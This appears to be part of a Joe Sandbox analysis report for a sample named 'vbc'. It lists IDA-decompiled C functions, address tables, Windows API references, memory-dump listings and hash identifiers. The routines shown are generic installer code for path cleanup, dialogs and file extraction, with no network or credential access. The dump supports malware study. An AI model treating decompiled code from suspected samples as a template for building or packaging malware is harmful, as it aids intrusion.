                                                0x0040280e
                                                0x00402807
                                                0x0040277f
                                                0x0040276b
                                                0x00402760
                                                0x00000000
                                                0x0040282c
                                                0x0040282c
                                                0x0040282f
                                                0x00402838
                                                0x00000000
                                                0x0040272f
                                                0x0040271a
                                                0x00402c33
                                                0x00402c39

                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004067C4(WCHAR* _a4) {
                                                				short _t5;
                                                				short _t7;
                                                				WCHAR* _t19;
                                                				WCHAR* _t20;
                                                				WCHAR* _t21;
                                                
                                                				_t20 = _a4;
                                                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                					_t20 =  &(_t20[4]);
                                                				}
                                                				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                					_t20 =  &(_t20[2]);
                                                				}
                                                				_t5 =  *_t20;
                                                				_t21 = _t20;
                                                				_t19 = _t20;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                							_t19 = CharNextW(_t19);
                                                						}
                                                						_t20 = CharNextW(_t20);
                                                						_t5 =  *_t20;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t19 =  *_t19 & 0x00000000;
                                                				while(1) {
                                                					_push(_t19);
                                                					_push(_t21);
                                                					_t19 = CharPrevW();
                                                					_t7 =  *_t19;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t19 =  *_t19 & 0x00000000;
                                                					if(_t21 < _t19) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                0x004067c6
                                                0x004067cf
                                                0x004067e6
                                                0x004067e6
                                                0x004067ed
                                                0x004067f9
                                                0x004067f9
                                                0x004067fc
                                                0x004067ff
                                                0x00406804
                                                0x00406806
                                                0x0040680f
                                                0x00406813
                                                0x00406830
                                                0x00406838
                                                0x00406838
                                                0x0040683d
                                                0x0040683f
                                                0x00406842
                                                0x00406847
                                                0x00406848
                                                0x0040684c
                                                0x0040684c
                                                0x0040684d
                                                0x00406854
                                                0x00406856
                                                0x0040685d
                                                0x00000000
                                                0x00000000
                                                0x00406865
                                                0x0040686b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040686b
                                                0x00406870

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-3083651966
                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}














                                                0x00404e62
                                                0x00404e6f
                                                0x00404e75
                                                0x00404eb3
                                                0x00404eb3
                                                0x00404ec2
                                                0x00404ec9
                                                0x00000000
                                                0x00404ecb
                                                0x00404e77
                                                0x00404e86
                                                0x00404e8e
                                                0x00404e91
                                                0x00404ea3
                                                0x00404ea9
                                                0x00404eb0
                                                0x00000000
                                                0x00404eb0
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                • GetMessagePos.USER32 ref: 00404E77
                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                				short _v132;
                                                				int _t11;
                                                				int _t20;
                                                
                                                				if(_a8 == 0x110) {
                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                					_a8 = 0x113;
                                                				}
                                                				if(_a8 == 0x113) {
                                                					_t20 =  *0x41ea18; // 0x1629b
                                                					_t11 =  *0x42aa24;
                                                					if(_t20 >= _t11) {
                                                						_t20 = _t11;
                                                					}
                                                					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                					SetWindowTextW(_a4,  &_v132);
                                                					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                				}
                                                				return 0;
                                                			}






                                                0x00402fa3
                                                0x00402fb1
                                                0x00402fb7
                                                0x00402fb7
                                                0x00402fc5
                                                0x00402fc7
                                                0x00402fcd
                                                0x00402fd4
                                                0x00402fd6
                                                0x00402fd6
                                                0x00402fec
                                                0x00402ffc
                                                0x0040300e
                                                0x0040300e
                                                0x00403016

                                                APIs
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E73282655() {
                                                				intOrPtr _t24;
                                                				void* _t26;
                                                				intOrPtr _t27;
                                                				signed int _t39;
                                                				void* _t40;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                
                                                				_t40 = E732812BB();
                                                				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                				do {
                                                					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                					}
                                                					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                					if(_t39 <= 7) {
                                                						switch( *((intOrPtr*)(_t39 * 4 +  &M73282784))) {
                                                							case 0:
                                                								 *_t40 = 0;
                                                								goto L17;
                                                							case 1:
                                                								__eax =  *__eax;
                                                								if(__ecx > __ebx) {
                                                									 *(__esp + 0x10) = __ecx;
                                                									__ecx =  *(0x7328407c + __edx * 4);
                                                									__edx =  *(__esp + 0x10);
                                                									__ecx = __ecx * __edx;
                                                									asm("sbb edx, edx");
                                                									__edx = __edx & __ecx;
                                                									__eax = __eax &  *(0x7328409c + __edx * 4);
                                                								}
                                                								_push(__eax);
                                                								goto L15;
                                                							case 2:
                                                								__eax = E73281510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                								goto L16;
                                                							case 3:
                                                								__ecx =  *0x7328506c;
                                                								__edx = __ecx - 1;
                                                								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                								__eax =  *0x7328506c;
                                                								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                								goto L17;
                                                							case 4:
                                                								__eax = lstrcpynW(__edi,  *__eax,  *0x7328506c);
                                                								goto L17;
                                                							case 5:
                                                								_push( *0x7328506c);
                                                								_push(__edi);
                                                								_push( *__eax);
                                                								__imp__StringFromGUID2();
                                                								goto L17;
                                                							case 6:
                                                								_push( *__esi);
                                                								L15:
                                                								__eax = wsprintfW(__edi, 0x73285000);
                                                								L16:
                                                								__esp = __esp + 0xc;
                                                								goto L17;
                                                						}
                                                					}
                                                					L17:
                                                					_t26 =  *(_t43 + 0x14);
                                                					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                						GlobalFree(_t26);
                                                					}
                                                					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(_t27 != 0) {
                                                						if(_t27 != 0xffffffff) {
                                                							if(_t27 > 0) {
                                                								E73281381(_t27 - 1, _t40);
                                                								goto L26;
                                                							}
                                                						} else {
                                                							E73281312(_t40);
                                                							L26:
                                                						}
                                                					}
                                                					_t44 = _t44 - 1;
                                                					_t43 = _t43 - 0x20;
                                                				} while (_t44 >= 0);
                                                				return GlobalFree(_t40);
                                                			}











                                                0x7328265f
                                                0x73282661
                                                0x73282665
                                                0x73282674
                                                0x73282678
                                                0x7328267d
                                                0x7328267d
                                                0x73282685
                                                0x7328268c
                                                0x73282692
                                                0x00000000
                                                0x73282699
                                                0x00000000
                                                0x00000000
                                                0x732826a1
                                                0x732826a5
                                                0x732826a8
                                                0x732826ac
                                                0x732826b3
                                                0x732826b7
                                                0x732826bd
                                                0x732826bf
                                                0x732826c1
                                                0x732826c1
                                                0x732826c8
                                                0x00000000
                                                0x00000000
                                                0x732826d1
                                                0x00000000
                                                0x00000000
                                                0x732826d8
                                                0x732826de
                                                0x732826e8
                                                0x732826ee
                                                0x732826f3
                                                0x00000000
                                                0x00000000
                                                0x73282714
                                                0x00000000
                                                0x00000000
                                                0x732826fa
                                                0x73282700
                                                0x73282701
                                                0x73282703
                                                0x00000000
                                                0x00000000
                                                0x7328271c
                                                0x7328271e
                                                0x73282724
                                                0x7328272a
                                                0x7328272a
                                                0x00000000
                                                0x00000000
                                                0x73282692
                                                0x7328272d
                                                0x7328272d
                                                0x73282732
                                                0x73282743
                                                0x73282743
                                                0x73282749
                                                0x7328274e
                                                0x73282753
                                                0x7328275f
                                                0x73282764
                                                0x00000000
                                                0x73282769
                                                0x73282755
                                                0x73282756
                                                0x7328276a
                                                0x7328276a
                                                0x73282753
                                                0x7328276b
                                                0x7328276c
                                                0x7328276f
                                                0x73282783

                                                APIs
                                                  • Part of subcall function 732812BB: GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5
                                                • GlobalFree.KERNEL32(?), ref: 73282743
                                                • GlobalFree.KERNEL32(00000000), ref: 73282778
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: df26d03a97e817f5113a3dc9f93109ac0b1fdb737bd8ec5bcfcf29d77c001928
                                                • Instruction ID: b34f27f60080445c526e11579c6f1be6ab316017ca26752e04c272a69485bd57
                                                • Opcode Fuzzy Hash: df26d03a97e817f5113a3dc9f93109ac0b1fdb737bd8ec5bcfcf29d77c001928
                                                • Instruction Fuzzy Hash: FA31047260431ADFD71A9F52CD88FEA7BBAFB853043248129F106972D0C7746884EB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00402950(int __ebx, void* __eflags) {
                                                				WCHAR* _t26;
                                                				void* _t29;
                                                				long _t37;
                                                				int _t49;
                                                				void* _t52;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                				void* _t61;
                                                
                                                				_t49 = __ebx;
                                                				_t52 = 0xfffffd66;
                                                				_t26 = E00402DA6(0xfffffff0);
                                                				_t55 = _t26;
                                                				 *(_t61 - 0x40) = _t26;
                                                				if(E00405E83(_t26) == 0) {
                                                					E00402DA6(0xffffffed);
                                                				}
                                                				E00406008(_t55);
                                                				_t29 = E0040602D(_t55, 0x40000000, 2);
                                                				 *(_t61 + 8) = _t29;
                                                				if(_t29 != 0xffffffff) {
                                                					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                					if( *(_t61 - 0x28) != _t49) {
                                                						_t37 =  *0x434f14;
                                                						 *(_t61 - 0x44) = _t37;
                                                						_t54 = GlobalAlloc(0x40, _t37);
                                                						if(_t54 != _t49) {
                                                							E004034E5(_t49);
                                                							E004034CF(_t54,  *(_t61 - 0x44));
                                                							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                							 *(_t61 - 0x10) = _t59;
                                                							if(_t59 != _t49) {
                                                								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                								while( *_t59 != _t49) {
                                                									_t60 = _t59 + 8;
                                                									 *(_t61 - 0x3c) =  *_t59;
                                                									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                									_t59 = _t60 +  *(_t61 - 0x3c);
                                                								}
                                                								GlobalFree( *(_t61 - 0x10));
                                                							}
                                                							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                							GlobalFree(_t54);
                                                							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                						}
                                                					}
                                                					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                					CloseHandle( *(_t61 + 8));
                                                				}
                                                				_t56 = 0xfffffff3;
                                                				if(_t52 < _t49) {
                                                					_t56 = 0xffffffef;
                                                					DeleteFileW( *(_t61 - 0x40));
                                                					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                				}
                                                				_push(_t56);
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
                                                				return 0;
                                                			}













                                                0x00402950
                                                0x00402952
                                                0x00402957
                                                0x0040295c
                                                0x0040295f
                                                0x00402969
                                                0x0040296d
                                                0x0040296d
                                                0x00402973
                                                0x00402980
                                                0x00402988
                                                0x0040298b
                                                0x00402997
                                                0x0040299a
                                                0x004029a0
                                                0x004029ae
                                                0x004029b3
                                                0x004029b7
                                                0x004029ba
                                                0x004029c3
                                                0x004029cf
                                                0x004029d3
                                                0x004029d6
                                                0x004029e0
                                                0x004029ff
                                                0x004029ec
                                                0x004029f4
                                                0x004029f7
                                                0x004029fc
                                                0x004029fc
                                                0x00402a06
                                                0x00402a06
                                                0x00402a13
                                                0x00402a19
                                                0x00402a1f
                                                0x00402a1f
                                                0x004029b7
                                                0x00402a33
                                                0x00402a35
                                                0x00402a35
                                                0x00402a3f
                                                0x00402a40
                                                0x00402a44
                                                0x00402a48
                                                0x00402a4e
                                                0x00402a4e
                                                0x00402a55
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                • CloseHandle.KERNEL32(?), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E73281979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                				void* _v8;
                                                				signed int _v12;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				char _v76;
                                                				void _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                				signed int _t48;
                                                				signed int _t57;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				signed int _t60;
                                                				signed int _t61;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t69;
                                                				void* _t70;
                                                				void* _t71;
                                                				signed int _t77;
                                                				void* _t81;
                                                				signed int _t83;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t101;
                                                
                                                				_t85 = __edx;
                                                				 *0x7328506c = _a8;
                                                				_t77 = 0;
                                                				 *0x73285070 = _a16;
                                                				_v12 = 0;
                                                				_v8 = E732812E3();
                                                				_t90 = E732813B1(_t42);
                                                				_t87 = _t85;
                                                				_t81 = E732812E3();
                                                				_a8 = _t81;
                                                				_t45 =  *_t81;
                                                				if(_t45 != 0x7e && _t45 != 0x21) {
                                                					_a16 = E732812E3();
                                                					_t77 = E732813B1(_t74);
                                                					_v12 = _t85;
                                                					GlobalFree(_a16);
                                                					_t81 = _a8;
                                                				}
                                                				_t46 =  *_t81 & 0x0000ffff;
                                                				_t101 = _t46 - 0x2f;
                                                				if(_t101 > 0) {
                                                					_t47 = _t46 - 0x3c;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags > 0) {
                                                								L56:
                                                								_t48 = 0;
                                                								__eflags = 0;
                                                								L57:
                                                								asm("cdq");
                                                								L58:
                                                								_t90 = _t48;
                                                								_t87 = _t85;
                                                								L59:
                                                								E73281510(_t85, _t90, _t87,  &_v76);
                                                								E73281312( &_v76);
                                                								GlobalFree(_v8);
                                                								return GlobalFree(_a8);
                                                							}
                                                							if(__eflags < 0) {
                                                								L49:
                                                								__eflags = 0;
                                                								L50:
                                                								_t48 = 1;
                                                								goto L57;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 < _t77) {
                                                								goto L49;
                                                							}
                                                							goto L56;
                                                						}
                                                						_t85 = _t87;
                                                						_t48 = E73283050(_t90, _t77, _t85);
                                                						goto L58;
                                                					}
                                                					_t57 = _t47 - 1;
                                                					__eflags = _t57;
                                                					if(_t57 == 0) {
                                                						__eflags = _t90 - _t77;
                                                						if(_t90 != _t77) {
                                                							goto L56;
                                                						}
                                                						__eflags = _t87 - _v12;
                                                						if(_t87 != _v12) {
                                                							goto L56;
                                                						}
                                                						goto L49;
                                                					}
                                                					_t58 = _t57 - 1;
                                                					__eflags = _t58;
                                                					if(_t58 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                							__eflags = _t87 - _v12;
                                                							if(__eflags < 0) {
                                                								goto L56;
                                                							}
                                                							if(__eflags > 0) {
                                                								goto L49;
                                                							}
                                                							__eflags = _t90 - _t77;
                                                							if(_t90 <= _t77) {
                                                								goto L56;
                                                							}
                                                							goto L49;
                                                						}
                                                						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                						_t85 = _t87;
                                                						_t59 = _t90;
                                                						_t83 = _t77;
                                                						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                							_t48 = E73283070(_t59, _t83, _t85);
                                                						} else {
                                                							_t48 = E732830A0(_t59, _t83, _t85);
                                                						}
                                                						goto L58;
                                                					}
                                                					_t60 = _t58 - 0x20;
                                                					__eflags = _t60;
                                                					if(_t60 == 0) {
                                                						_t90 = _t90 ^ _t77;
                                                						_t87 = _t87 ^ _v12;
                                                						goto L59;
                                                					}
                                                					_t61 = _t60 - 0x1e;
                                                					__eflags = _t61;
                                                					if(_t61 == 0) {
                                                						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                							_t90 = _t90 | _t77;
                                                							_t87 = _t87 | _v12;
                                                							goto L59;
                                                						}
                                                						__eflags = _t90 | _t87;
                                                						if((_t90 | _t87) != 0) {
                                                							goto L49;
                                                						}
                                                						__eflags = _t77 | _v12;
                                                						if((_t77 | _v12) != 0) {
                                                							goto L49;
                                                						}
                                                						goto L56;
                                                					}
                                                					__eflags = _t61 == 0;
                                                					if(_t61 == 0) {
                                                						_t90 =  !_t90;
                                                						_t87 =  !_t87;
                                                					}
                                                					goto L59;
                                                				}
                                                				if(_t101 == 0) {
                                                					L21:
                                                					__eflags = _t77 | _v12;
                                                					if((_t77 | _v12) != 0) {
                                                						_v24 = E73282EE0(_t90, _t87, _t77, _v12);
                                                						_v20 = _t85;
                                                						_t48 = E73282F90(_t90, _t87, _t77, _v12);
                                                						_t81 = _a8;
                                                					} else {
                                                						_v24 = _v24 & 0x00000000;
                                                						_v20 = _v20 & 0x00000000;
                                                						_t48 = _t90;
                                                						_t85 = _t87;
                                                					}
                                                					__eflags =  *_t81 - 0x2f;
                                                					if( *_t81 != 0x2f) {
                                                						goto L58;
                                                					} else {
                                                						_t90 = _v24;
                                                						_t87 = _v20;
                                                						goto L59;
                                                					}
                                                				}
                                                				_t67 = _t46 - 0x21;
                                                				if(_t67 == 0) {
                                                					_t48 = 0;
                                                					__eflags = _t90 | _t87;
                                                					if((_t90 | _t87) != 0) {
                                                						goto L57;
                                                					}
                                                					goto L50;
                                                				}
                                                				_t68 = _t67 - 4;
                                                				if(_t68 == 0) {
                                                					goto L21;
